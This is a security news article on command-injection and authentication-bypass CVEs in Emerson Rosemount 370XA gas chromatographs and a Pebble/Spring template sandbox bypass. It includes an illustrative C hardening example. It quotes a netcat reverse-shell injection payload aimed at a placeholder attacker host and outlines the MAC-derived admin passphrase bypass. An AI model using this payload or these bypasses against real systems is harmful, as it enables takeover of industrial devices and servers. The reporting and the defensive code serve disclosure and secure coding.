
Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data


Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution (command injection) flaw in the implementation of the "forced calibration" command. The flaw stems from a system() call that executes a constructed shell command containing a user-provided file name without proper sanitization, so an attacker can inject arbitrary shell commands through that file name.

An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.
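The pattern Team82 describes is a classic one: a file name supplied by the caller is pasted into a shell command string and handed to system(), so shell metacharacters in the name are interpreted by /bin/sh. The added example below is not Emerson's firmware code; it illustrates the unsafe construction in a small, self-contained form next to a hardened replacement that allow-lists the file name and runs gunzip via an argv array, so no shell ever parses the name. Function names, the file-name policy and the output path convention are assumptions for illustration.

```c
/* Added example, not Emerson's firmware: an unsafe "build a shell command
 * from a caller-supplied file name" pattern next to a hardened version. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define NAME_MAX_LEN 64

/* Unsafe pattern (illustrative only): the file name is interpolated into a
 * command line that would be passed to system(). Any ';', '|', '>' or '$'
 * in `name` reaches /bin/sh verbatim. Returns 0 on success, -1 if truncated. */
int build_shell_command_unsafe(const char *name, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "gunzip -c %s > %s.expanded", name, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Allow-list check (assumed policy): letters, digits, '.', '_' and '-' only;
 * must not be empty, must not start with '-' (option injection) or '.'
 * (hidden files), and must not contain ".." (path traversal).
 * Returns 1 if the name is acceptable, 0 otherwise. */
int valid_calibration_name(const char *name)
{
    size_t len = name ? strlen(name) : 0;
    if (len == 0 || len >= NAME_MAX_LEN) return 0;
    if (name[0] == '-' || name[0] == '.') return 0;
    if (strstr(name, "..") != NULL) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/* Hardened replacement: validate first, then fork/exec gunzip with an argv
 * array. No shell is involved, so metacharacters cannot be interpreted, and
 * the output redirection is done with dup2 instead of a shell '>'.
 * Returns the child's exit status, or -1 if the name is rejected or the
 * child could not be started. */
int expand_calibration_file(const char *name, const char *out_path)
{
    if (!valid_calibration_name(name)) return -1;
    FILE *out = fopen(out_path, "wb");
    if (out == NULL) return -1;
    pid_t pid = fork();
    if (pid < 0) { fclose(out); return -1; }
    if (pid == 0) {
        dup2(fileno(out), STDOUT_FILENO);
        char *const argv[] = { "gunzip", "-c", (char *)name, NULL };
        execvp(argv[0], argv);
        _exit(127);               /* exec failed: report, never fall back to sh */
    }
    fclose(out);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample names: one benign, one carrying a shell separator. */
    const char *samples[] = { "calib1.gz", "calib1.gz; echo oops", "../etc/x" };
    char cmd[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        build_shell_command_unsafe(samples[i], cmd, sizeof cmd);
        printf("name=%-22s unsafe cmd=[%s] allowed=%d\n",
               samples[i], cmd, valid_calibration_name(samples[i]));
    }
    return 0;
}
```

The validator is deliberately an allow-list rather than a list of forbidden characters: a block-list has to anticipate every metacharacter of every shell, while the allow-list only has to describe what a legitimate calibration file name looks like. Even with the check in place, the exec-without-shell path is what removes the injection class entirely.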

The second vulnerability, CVE-2023-51761, is an authentication bypass: an attacker can calculate the secret passphrase used to reset the administrator password. Because the passphrase is derived from the device's MAC address, which is easily obtained, an attacker who understands the passphrase validation process can generate the passphrase from the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.

Critical Security Bug Detected in Java Template Framework Pebble


A vulnerability in Pebble, a Java templating engine, could allow an attacker to circumvent its security safeguards and mount command injection attacks against host servers.

Pebble Templates is primarily used to generate HTML output, but it can also be used to produce CSS, XML, JS and other text formats. The templates are popular because of their user-friendly web application templating system, internationalization capabilities, and security features such as auto-escaping and a block-list method access validator intended to thwart command execution attacks.

However, a security researcher at GitHub has found that, with the right code and template files, Pebble's command execution defense can be bypassed easily.

Circumventing Pebble Security 

The bypass technique works when Pebble is used in combination with Spring, a well-known Java application framework. Multiple Spring classes are registered as beans, allowing them to be instantiated dynamically at runtime. By going through the Java beans machinery, an attacker can obtain one of the Spring objects that supports class loading.

Subsequently, the attacker can use Jackson, a data-parsing library, to read an XML file that names a class to instantiate and a method to invoke. This gives a threat actor a window to execute arbitrary code on the host server.

As a proof of concept, the researcher loaded an XML file from the internet using a Pebble template, then instantiated a Java class that allowed server-side system commands to be executed.

No easy solution yet 

The security bug report has sparked conversation among GitHub researchers. Because the vulnerability has been assigned a CVE, business systems that rely on the latest version of Pebble are receiving security alerts.

The maintainers are working on a fix, but since it is a community-driven project, it remains unclear when it will be published. The developers have issued a few temporary workarounds to safeguard projects in the interim. 

It is worth noting that to exploit the bug, an attacker would need a way to upload a malicious Pebble template to the server. Hence, organizations must tighten checks on user-provided content and limit template uploads. Businesses can also apply sanitization to spot and reject malicious content before it is used in a template.